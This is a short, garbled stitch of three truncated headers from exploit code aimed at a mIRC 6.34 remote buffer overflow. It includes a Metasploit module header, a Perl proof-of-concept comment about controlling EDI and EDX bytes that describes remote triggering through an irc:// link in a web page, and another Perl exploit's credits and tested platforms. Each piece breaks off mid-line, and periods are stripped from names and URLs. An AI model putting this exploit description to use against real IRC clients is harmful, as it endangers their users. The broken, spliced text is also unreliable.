##
# $Id: mirc_privmsg_serverrb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# Framework web site for more information on licensing and terms of use
# metasploitcom/framework/
##
class Metasploit3 < ...
##################################################################################################
# Mirc 634 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes
#
# To become remote, add a simple documentlocationhref=irc://servercom/ in some html page
#
use IO::Socket;
sub sock()
{
my $sock=new IO::Socke ...
#!/usr/bin/perl
#
#
# mIRC 634 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC
#
# Tested on Windows XP SP3 English and Windows Vista SP0
#
# Credits to securfrog for publishing the PoC
#
# Author has no responsib ...